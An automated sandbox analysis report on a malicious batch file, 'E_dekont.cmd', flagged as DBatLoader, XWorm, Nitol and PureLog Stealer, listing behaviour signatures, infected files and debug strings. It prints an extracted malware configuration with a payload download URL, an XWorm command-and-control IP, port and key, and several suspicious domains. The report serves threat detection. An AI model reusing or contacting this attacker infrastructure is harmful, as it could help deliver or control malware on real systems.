Windows Analysis Report
E_dekont.cmd

Overview

General Information

Sample name:	E_dekont.cmd
Analysis ID:	1546600
MD5:	79c1ba6106f6cb367fc280abae110506
SHA1:	2656bbcf91b0dd2261a5b9fb44e41539931243ac
SHA256:	09ed171d42a56e9db61a78259695d8d3b2e623348ed2d24dc58745e134997df6
Tags:	cmduser-lowmal3
Infos:

Detection

DBatLoader, Nitol, PureLog Stealer, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected Nitol

Yara detected PureLog Stealer

Yara detected XWorm

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to behave differently if execute on a Russian/Kazak computer

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Creates files in the system32 config directory

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executable to a common third party application directory

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Installs a global keyboard hook

Machine Learning detection for dropped file

Queries random domain names (often used to prevent blacklisting and sinkholes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Executes massive DNS lookups (> 100)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Uncommon Svchost Parent Process

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: E_dekont.cmd	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://chichometextiles.com/wp-admin/233_Jwsmvmdweya"]}
Source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["62.60.190.120"], "Port": "7923", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for domain / URL

Source: uaafd.biz	Virustotal: Detection: 12%	Perma Link
Source: xnxvnn.biz	Virustotal: Detection: 13%	Perma Link
Source: nlscndwp.biz	Virustotal: Detection: 11%	Perma Link
Source: vjaxhpbji.biz	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for submitted file

Source: E_dekont.cmd	ReversingLabs: Detection: 44%
Source: E_dekont.cmd	Virustotal: Detection: 46%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
